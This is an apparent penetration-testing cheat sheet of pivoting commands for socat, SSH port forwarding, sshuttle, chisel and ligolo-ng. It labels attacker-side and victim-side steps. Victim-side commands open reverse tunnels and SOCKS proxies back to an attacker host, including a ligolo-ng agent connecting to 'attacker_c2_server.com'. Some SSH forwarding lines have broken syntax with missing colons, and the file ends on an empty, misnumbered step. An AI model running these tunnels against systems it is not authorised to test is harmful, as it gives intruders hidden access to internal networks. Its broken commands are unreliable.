### Port forwarding
socat TCP-LISTEN:<tcp_port>,fork TCP:<target_ip>

### SSH Local port forwarding
ssh -N -L 0.0.0.0:<tcp_port><target_machine_ip><target_machine_port> <accessible_machine_ssh_user>@<accessible_machine_ip>

### SSH Dynamic port forwarding
ssh -N -D 0.0.0.0:<tcp_port> <accessible_machine_ssh_user>@<accessible_machine_ip>
##### Require to setup proxychains /etc/proxychains4.conf

### SSH Remote port forwarding
ssh -N -R 127.0.0.1:<tcp_port>:<target_machine_ip><target_machine_port> <kali_machine_ssh_user>@<kali_machine_ip>

### SSH Remote dynamic port forwarding
ssh -N -R <tcp_port> <kali_machine_ssh_user>@<kali_machine_ip>
##### Require to setup proxychains /etc/proxychains4.conf

### SSHuttle
sshuttle -r <accessible_machine_ssh_user>@<accessible_machine_ip>:<tcp_port> <10.4.50.0/24> <172.16.50.0/24>

### Chisel Port Forwading
#### Attacker side
chisel server --port 8080 --reverse
#### Victim side
./chisel client <attacker-ip>:8080 R:<attacker-listener-port>:127.0.0.1:<victim-target-port>

### Chisel Reverse Dynamic Socks Proxy
#### Attacker side
chisel server --port 8080 --reverse
sudo vim /etc/proxychains.conf
-> socks5  127.0.0.1  1080
#### Victim side
./chisel client <attacker-ip>:8080 R:socks

### ligolo-ng
#### STEP-1 (Attacker side)
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
#### STEP-2 (Attacker side: Running proxy server)
$ ./proxy -selfcert
#### STEP-3 (Victim side: Running agent)
$ ./agent -connect attacker_c2_server.com:11601 -ignore-cert
#### STEP-4 (Attacker side: Select session)
ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
#### STEP-5 (Attacker side: Looking for network interface once connection is established from the above command)
[Agent : nchatelain@nworkstation] » ifconfig 
[...]
┌─────────────────────────────────────────────┐
│ Interface 3                                 │
├──────────────┬──────────────────────────────┤
│ Name         │ wlp3s0                       │
│ Hardware MAC │ de:ad:be:ef:ca:fe            │
│ MTU          │ 1500                         │
│ Flags        │ up|broadcast|multicast       │
│ IPv4 Address │ 192.168.0.30/24             │
└──────────────┴──────────────────────────────┘
#### STEP-6 (Attacker side: Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.)
$ sudo ip route add 192.168.0.0/24 dev ligolo
#### STEP-7: (Attacker side: Start the proxy)
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation 
You can now access the 192.168.0.0/24 agent network from the proxy server. 

#### STEP-5 ()
